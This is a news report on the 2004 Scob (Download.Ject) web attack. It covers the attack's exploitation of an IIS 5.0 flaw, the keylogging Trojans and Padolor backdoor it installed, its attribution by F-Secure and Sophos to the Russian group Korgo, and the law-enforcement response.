The Scob attack – code implanted into a number of popular Websites, including at least one as-yet unnamed auction site and several banking sites, reportedly – has been tied by at least two major Internet security companies to the Russian virus writing group known as Korgo. And law enforcement is reportedly probing the group over the new attacks.
F-Secure antivirus research director Mikko Hypponen has told reporters his team spent most of the night examining Scob details, enough to determine the likely source was Korgo, which has hacked into the servers of major Internet providers hosting big sites and embedding the Scob code.
And Graham Cluley, senior tech consultant for Sophos, has told reporters his team also tied Scob to Korgo, though they haven't yet been able to get to the Web addresses which download the program.
When unsuspecting visitors reach the infected Websites, Scob ties their computers to Web addresses run by the hackers and lets the hackers install a Trojan horse in those computers, which then uses keystroke loggers to gather surfers' passwords, logins, PayPal payment data, and other such information, Hypponen said at midday June 25.
Earlier June 25, undetermined numbers of Web surfers using Microsoft Internet Explorer picked up Scob, which exploits a flaw in Microsoft's IIS 5.0 program for Web servers. The Internet Storm Center at the SANS Institute, a collaborative between universities and private researchers, declined through this writing to list the sites they knew of which had been infected by Scob – which is also known as Download.Ject or Toofer – in order to try preventing even further abuse.
Early reporting suggested Scob's actual motive was to open yet another pathway for mass spammers, who have been suspected in the recent past of either writing and distributing their own such malware or tying to virus writers in a mutual partnership – when not, as some reported, waging wars against each other.
"We won't list the sites that are reported to be infected in order to prevent further abuse," said an early Internet Storm Center announcement, "but the list is long and includes businesses that we presume would normally be keeping their sites fully patched."
Scob is different than viruses which travel by e-mail because it takes nothing more than visiting an infected Website, and you won't even know you visited one until you learn the hard way, according to experts talking to the press within hours of the bug's appearance.
Scob opens a pathway for installation of Trojans that put anything from keystroke loggers or proxy servers to other backdoor bugs. Another security firm, Sophos, said within hours of Scob's full-fledged launch that Internet Explorer users visiting infected Websites would find their computers trying to download a file from a Website then identified but suspected of being Russian in origin.
Hypponen also said the Web addresses where the stolen information is stored are not obvious, with potential hackers having to reverse-engineer code to find them. But law enforcement authorities who were already probing Korgo have launched a probe into the Scob attacks and are trying to shut down the addresses to which Scob's programming draws the visitors from the infected Websites.
F-Secure said earlier June 25 that Scob's downloader has been used to install variants of the Padolor backdoor, which was the brainchild of another Russian hacking group, known as HangUp Team, and which steals sensitive personal information including credit, logins, passwords, and other sensitive data. A variant known as Padolor.w was found early June 25, as Scob began hitting the Web in earnest.
